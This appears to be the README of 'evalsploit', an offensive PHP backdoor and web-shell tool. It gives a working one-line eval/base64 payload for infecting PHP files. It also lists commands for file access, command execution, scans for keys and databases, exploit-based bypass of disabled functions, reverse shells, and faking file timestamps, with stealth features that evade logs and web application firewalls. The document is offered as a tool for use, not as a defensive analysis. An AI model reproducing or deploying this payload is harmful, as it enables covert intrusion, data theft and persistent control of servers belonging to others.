
Based on eval function PHP one-line backdoor

Primary LanguagePHP

Okay, so, this text is for 2.6.0 #release. New version works with generated parametrs, so use gen command first to get actual payload - workaround until 2.8.0 so be patient, please. Will do a sessions to fix. Thank you. You can also mutate payload in infected php using mutate comand, but other infected urls will not work due to the mutated parametrs (will fix it soon, dont worry)


Backdoor based on the eval function. Can be used as standalone web-shell


  • Stealth

    • Works on POST requests, practically invisible to logs
    • Built-in WAF bypass
    • New user agent every new session
    • Stealth operation setting
    • Polymorphic payloads
  • Universal

    • Payload can be injected in any part of the php code
    • Suitable for working with servers on Linux, Windows, Mac OS


Getting started

  1. Use the payload to infect PHP or as an independent shell: if(isset($_POST['Z'])){@eval(base64_decode(str_replace($_POST['V'], '' ,$_POST['Z'])));die();}
  2. When starting the program, evalsploit will require a link to the file with the payload
  3. When changing the send module (see "program setup"), use the gen command to generate a new payload

Working with the file system

  • ls: list of files in the directory

    • Setting ls: based on the DirectoryIterator function (stands by default)
    • Setting dir: based on the ScanDir function
  • cp: copying files

    • Use the separator : (/what.txt : /where/what.txt )
  • cd: moving through the file system

  • mkd: create a new directory

  • upl: upload a file to the server

  • home: back to __DIR__

  • pwd: print the active directory

Working with files

  • cat: print the file contents

    • Setting html: based on the htmlentities function
    • Setting base64: based on the base64_encode\base64_decode function (set as default)
  • rm: delete file

  • dl: download file (to the /download folder)

    • Does not work well with files larger than 100 MB
  • edit: edit file contents

    • Does not work well with files larger than 100 MB
  • mkf: create new file

  • touch: change file datestamp

    • Use the settime separator (file.рhр settime Year-Month-Day Hour:Minute:Second)
  • stat: file information

  • ren: rename file

    • Use the separator : (/where/old.txt : new.php )

Working with the evalsploit system

  • run: switch to command line mode

    • exit to exit the mode
    • Supports exec, shell_exec, system, passthru, popen, proc_open, expect_popen, pcntl_exec, do
  • info: server informtion

    • php version, OS
  • scan: scanning the selected directory

    • Search for system PHP, databases, keys etc
  • exploit: bypassing disabled command line with built-in exploits, activates the command line mode

    • exit to exit the mode
  • reverse: reverse-shell - reverse IP:PORT

  • gen: generating a payload depending on the send module

  • help: home screen

  • exit: exit

Program Setup

  • set: configuring modules. To view the list of parameters use set module help
    • Instead of help acceptable -h, h, ?, /?)
    • run: exec, shell_exec, system, passthru, popen, proc_open, expect_popen, pcntl_exec, do
    • ls: ls, dir
    • cat: html, base64
    • silent: 1, 0 (Stealth)
    • reverse: ivan, monkey
    • send: bypass, classic, simple (send mmodule)


Thanks to Zuo Yunfan for helping with the Chinese translation